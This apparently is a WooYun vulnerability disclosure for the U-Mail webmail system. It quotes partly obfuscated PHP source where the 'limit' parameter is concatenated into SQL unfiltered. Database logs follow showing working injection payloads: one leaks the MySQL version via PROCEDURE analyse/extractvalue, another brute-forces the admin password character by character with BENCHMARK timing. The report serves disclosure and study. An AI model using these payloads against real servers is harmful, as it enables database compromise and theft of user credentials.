WooYun.org

if ( ACTION == "member-get" )
{
		$dept_id = gss( $_GET['dept_id'] );
		$dept_id = intval( $dept_id );//此处不传入该变量
		$keyword = gss( $_GET['keyword'] );
		$page = $_GET['page'] ? gss( $_GET['page'] ) : 1;
		$limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25;//此处的limit可控，不传入的话其值为25
		$orderby = gss( $_GET['orderby'] );
		$is_reverse = gss( $_GET['is_reverse'] );
		$data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );
		$department_list = create_array( $data_cache, "dept_id", "name" );
		$Tree = $Department->getTreeObject( );
		$Tree->set_data_cache( $data_cache );
		$Tree->sort_data( -1, 1 );
		$where = "t1.CalendarOnly='0'";
		if ( $dept_id && $dept_id != "-1" )
		{
				$dept_ids = $Tree->get_child_id( $dept_id );
				$user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
				$where .= " AND t1.UserID IN (".$user_ids.")";
		}
		else
		{
				$dept_permit = get_session( "dept_permit" );
				if ( $dept_permit == "1" )
				{
						$where_map = "user_id='".$user_id."'";
						$arr_tmp = $Department->get_map( array(
								"fields" => "*",
								"where" => $where_map,
								"orderby" => "dept_id",
								"debug" => 0
						) );
				}
				else if ( $dept_permit == "-1" )
				{
						$where_permit = "domain_id='".$domain_id."' AND user_id='".$user_id."'";
						$arr_tmp = $Department->get_deptpermit( array(
								"fields" => "*",
								"where" => $where_permit,
								"debug" => 0
						) );
				}
				if ( $arr_tmp )
				{
						$dept_arr = array( );
						foreach ( $arr_tmp as $arr )
						{
								$dept_arr[] = $Tree->get_child_id( $arr['dept_id'] );
						}
						$dept_ids = implode( ",", $dept_arr );
				}
				if ( $dept_ids )
				{
						$user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
						$where .= " AND t1.UserID IN (".$user_ids.")";
				}
		}
		if ( $keyword )
		{
				if ( strpos( $keyword, "@" ) )
				{
						$key_tmp = explode( "@", $keyword );
						$keyword = $key_tmp[0];
				}
				$where .= " AND (t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";
		}
		switch ( $orderby )
		{
		case "fullname" :
          ......
		case "email" :
				$orderby = "t1.Mailbox";
				break;
				$orderby = "";
		}
		$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );//todo 分析该函数

public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYwÿ = "", $_obfuscate_AedrEgÿÿ = "", $_obfuscate_xvYeh9Iÿ = "", $_obfuscate_tUi30UB0e88ÿ = "", $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ = FALSE, $_obfuscate_ySeUHBwÿ = FALSE )
		{
				$_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );
				$_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
				if ( $_obfuscate_IRFhnYwÿ )
				{
						$_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYwÿ;
				}
				if ( $_obfuscate_xvYeh9Iÿ )
				{
						if ( $_obfuscate_AedrEgÿÿ )
						{
								$_obfuscate_mV9HBLYÿ = $_obfuscate_AedrEgÿÿ * $_obfuscate_xvYeh9Iÿ - $_obfuscate_xvYeh9Iÿ;
						}
						if ( $_obfuscate_mV9HBLYÿ )
						{
								$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_mV9HBLYÿ.",".$_obfuscate_xvYeh9Iÿ;
						}
						else
						{
								$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_xvYeh9Iÿ;//此处将获取的limit拼接志sql语句，只需要控制相应的参数为空即可
						}
				}
				if ( $_obfuscate_tUi30UB0e88ÿ )
				{
						$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY ".$_obfuscate_tUi30UB0e88ÿ;
						if ( $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ )
						{
								$_obfuscate_5e2O0TiivW7ec4cÿ .= " DESC";
						}
						$_obfuscate_5e2O0TiivW7ec4cÿ .= ",t1.FullName ASC";
				}
				else
				{
						$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
				}
				$_obfuscate_mGXfswsMZQÿÿ = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\t\t\tFROM ".$this->get_table_name( "mailbox" )." as t1, ".$this->get_table_name( "info" )." as t2\r\n\t\t\t\tWHERE ".$_obfuscate_zbtFQY92OYenSG9u."\r\n\t\t\t\t".$_obfuscate_5e2O0TiivW7ec4cÿ;
				$_obfuscate_YdwIclUMQÿÿ = $_obfuscate_mGXfswsMZQÿÿ." ".$_obfuscate_UFlHiZJcJu6DQBFE;
				if ( $_obfuscate_ySeUHBwÿ )
				{
						dump( $_obfuscate_YdwIclUMQÿÿ );
				}
				$_obfuscate_MbMfEtWGUpEscGl = $this->db_count( $_obfuscate_mGXfswsMZQÿÿ );
				unset( $_obfuscate_1LzzW8sGEkLaizkÿ );
				$_obfuscate_6RYLWQÿÿ = $this->db_select( $_obfuscate_YdwIclUMQÿÿ, "more" );
				return array(
						"count" => $_obfuscate_MbMfEtWGUpEscGl,
						"data" => $_obfuscate_6RYLWQÿÿ
				);
		}

150124 13:53:59	 2772 Query	SELECT DomainName from domains
		 2772 Query	SELECT UserID, Mailbox, FullName, MailDir, Password, AutoDecode, IsForwarding, AllowAccess, AllowChangeViaEmail, KeepForwardedMail, HideFromEveryone, EncryptMail, ApplyQuotas, EnableMultiPop, CanModifyGAB, CalendarOnly, MaxMessageCount, MaxDiskSpace, UserList.DomainID, Domains.DomainName, Domains.DomainID FROM UserList, Domains WHERE UserList.DomainID=Domains.DomainID AND FullName = 'mdaemon server' AND DomainName = 'fuck.com'
		 2772 Query	SELECT DomainName from domains
		 2772 Query	SELECT * FROM Domains
		 2880 Connect	umail@localhost on 
		 2880 Query	SET NAMES 'UTF8'
		 2880 Init DB	umail
		 2880 Query	SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
		 2880 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.CalendarOnly='0'
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
		 2880 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.CalendarOnly='0'
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 25

150124 14:06:57	 2888 Connect	umail@localhost on 
		 2888 Query	SET NAMES 'UTF8'
		 2888 Init DB	umail
		 2888 Query	SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
		 2888 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.CalendarOnly='0'
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
		 2888 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.CalendarOnly='0'
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
		 2888 Quit

150124 14:43:21	 2911 Connect	umail@localhost on 
		 2911 Query	SET NAMES 'UTF8'
		 2911 Init DB	umail
		 2911 Query	SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
		 2911 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.CalendarOnly='0'
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
		 2911 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.CalendarOnly='0'
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)